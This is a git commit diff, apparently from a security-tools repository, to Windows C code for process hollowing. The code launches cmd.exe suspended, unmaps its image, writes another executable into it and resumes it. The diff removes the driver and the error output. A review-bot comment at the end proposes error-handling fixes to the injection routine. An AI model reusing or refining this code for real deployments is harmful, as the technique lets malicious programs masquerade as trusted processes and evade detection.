
removed extra stuff

git-svn-id: file:///home/svn/incoming/trunk@2808 4d416f70-5f16-0410-b530-b9f4589650da
Matt Miller 2005-07-22 03:37:32 +00:00
parent ef3185398a
commit c1e62905dc


@ -12,8 +12,6 @@
*/
#include "precomp.h"
#define DUMMY_PROCESS "cmd.exe"
typedef ULONG NTSTATUS;
typedef enum _PROCESSINFOCLASS
{
@ -37,185 +35,11 @@ typedef struct _PROCESS_BASIC_INFORMATION
HANDLE InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
LPVOID MapNewExecutableRaw(
IN LPCSTR ExecutableFilePath);
BOOL MapNewExecutableRegionInProcess(
IN HANDLE TargetProcessHandle,
IN HANDLE TargetThreadHandle,
IN LPVOID NewExecutableRawImage);
int main(
IN int argc,
IN char **argv)
{
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO StartupInformation;
LPVOID NewExecutableRawImage = NULL;
//
// If we lived without initialization we'd be a conglomerate of chaos and
// unpredictability...
//
ZeroMemory(
&StartupInformation,
sizeof(StartupInformation));
ZeroMemory(
&ProcessInformation,
sizeof(ProcessInformation));
StartupInformation.cb = sizeof(StartupInformation);
do
{
//
// Yeah...
//
if (argc == 1)
{
fprintf(stderr, "Usage: %s [executable]\n",
argv[0]);
SetLastError(
ERROR_INVALID_PARAMETER);
break;
}
//
// Map in the raw contents of the executable
//
if (!(NewExecutableRawImage = MapNewExecutableRaw(
argv[1])))
{
fprintf(stderr, "MapNewExecutableRaw failed, %lu.\n",
GetLastError());
break;
}
//
// Run it...
//
if (!CreateProcess(
NULL,
DUMMY_PROCESS,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&StartupInformation,
&ProcessInformation))
{
fprintf(stderr, "CreateProcess(\"%s\") failed, %lu.\n",
DUMMY_PROCESS,
GetLastError());
break;
}
//
// Unmap the dummy executable and map in the new executable into the
// target process
//
if (!MapNewExecutableRegionInProcess(
ProcessInformation.hProcess,
ProcessInformation.hThread,
NewExecutableRawImage))
{
fprintf(stderr, "MapNewExecutableRegionInProcess failed, %lu.\n",
GetLastError());
break;
}
//
// Resume the thread and let it rock...
//
if (ResumeThread(
ProcessInformation.hThread) == (DWORD)-1)
{
fprintf(stderr, "ResumeThread failed, %lu.\n",
GetLastError());
break;
}
} while (0);
//
// Cleanup
//
if (ProcessInformation.hProcess)
CloseHandle(
ProcessInformation.hProcess);
if (ProcessInformation.hThread)
CloseHandle(
ProcessInformation.hThread);
return GetLastError();
}
//
// Maps the raw contents of the supplied executable image file into the current
// process and returns the address at which the image is mapped.
//
LPVOID MapNewExecutableRaw(
IN LPCSTR ExecutableFilePath)
{
HANDLE FileHandle = NULL;
HANDLE FileMappingHandle = NULL;
LPVOID NewExecutableRawImage = NULL;
do
{
if ((FileHandle = CreateFile(
ExecutableFilePath,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_FLAG_RANDOM_ACCESS,
NULL)) == INVALID_HANDLE_VALUE)
{
fprintf(stderr, "CreateFile failed, %lu.\n",
GetLastError());
break;
}
if (!(FileMappingHandle = CreateFileMapping(
FileHandle,
NULL,
PAGE_READONLY,
0,
0,
NULL)))
{
fprintf(stderr, "CreateFileMapping failed, %lu.\n",
GetLastError());
break;
}
if (!(NewExecutableRawImage = MapViewOfFile(
FileMappingHandle,
FILE_MAP_READ,
0,
0,
0)))
{
fprintf(stderr, "MapViewOfFile failed, %lu.\n",
GetLastError());
break;
}
} while (0);
if (FileMappingHandle)
CloseHandle(
FileMappingHandle);
if (FileHandle)
CloseHandle(
FileHandle);
return NewExecutableRawImage;
}
//
// Maps the contents of the executable image into the new process and unmaps
// the original executable. All necessary fixups are performed to allow the
@ -265,8 +89,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetThreadHandle,
&ThreadContext))
{
fprintf(stderr, "GetThreadContext failed, %lu.\n",
GetLastError());
break;
}
@ -285,9 +107,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetProcessHandle,
OldEntryPoint)) != ERROR_SUCCESS)
{
fprintf(stderr, "NtUnmapViewOfSection failed, %.8x.\n",
Status);
SetLastError(ERROR_INVALID_ADDRESS);
break;
}
@ -301,11 +120,7 @@ BOOL MapNewExecutableRegionInProcess(
if (!SetThreadContext(
TargetThreadHandle,
&ThreadContext))
{
fprintf(stderr, "SetThreadContext failed, %lu.\n",
GetLastError());
break;
}
//
// Allocate storage for the new executable in the child process
@ -316,11 +131,7 @@ BOOL MapNewExecutableRegionInProcess(
NtHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)))
{
fprintf(stderr, "VirtualAllocEx failed, %lu.\n",
GetLastError());
break;
}
//
// Update the executable's image base address in the PEB...
@ -336,11 +147,7 @@ BOOL MapNewExecutableRegionInProcess(
&BasicInformation,
sizeof(BasicInformation),
&SizeOfBasicInformation) != ERROR_SUCCESS)
{
fprintf(stderr, "NtQueryInformationProcess failed, %lu.\n",
GetLastError());
break;
}
ProcessPeb = BasicInformation.PebBaseAddress;
@ -350,11 +157,7 @@ BOOL MapNewExecutableRegionInProcess(
(LPVOID)&NtHeader->OptionalHeader.ImageBase,
sizeof(LPVOID),
NULL))
{
fprintf(stderr, "WriteProcessMemory(ImageBaseAddress) failed, %lu.\n",
GetLastError());
break;
}
//
// Copy the image headers and all of the section contents
@ -365,11 +168,7 @@ BOOL MapNewExecutableRegionInProcess(
NewExecutableRawImage,
NtHeader->OptionalHeader.SizeOfHeaders,
NULL))
{
fprintf(stderr, "WriteProcessMemory(Headers) failed, %lu.\n",
GetLastError());
break;
}
Success = TRUE;
@ -387,9 +186,6 @@ BOOL MapNewExecutableRegionInProcess(
SectionHeader[SectionIndex].SizeOfRawData,
NULL))
{
fprintf(stderr, "WriteProcessMemory(Section) failed, %lu.\n",
GetLastError());
Success = FALSE;
break;
}
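Review bot: The `NtQueryInformationProcess(...) != ERROR_SUCCESS` failure path (hunk at new line 147) now falls straight to `break;` without setting a last-error value, so the caller gets FALSE with whatever GetLastError() held from an earlier, unrelated call. Native NT calls report failure through their NTSTATUS return and do not set the thread's last-error value themselves. The `NtUnmapViewOfSection` branch (hunk at new line 107) appears to keep `SetLastError(ERROR_INVALID_ADDRESS);`, so the two NT-call failure paths are inconsistent; I would add `SetLastError(ERROR_GEN_FAILURE);` before the `break;` here, or translate the captured status if the file already has a helper for that. The same branch compares an NTSTATUS against the Win32 constant `ERROR_SUCCESS`, which only works because both are zero, and a one-line comment saying so would help. The `+`/`-` markers are lost on this page, so which lines are removed is inferred from the hunk line counts, and `MapNewExecutableRegionInProcess` begins and ends outside the visible hunks.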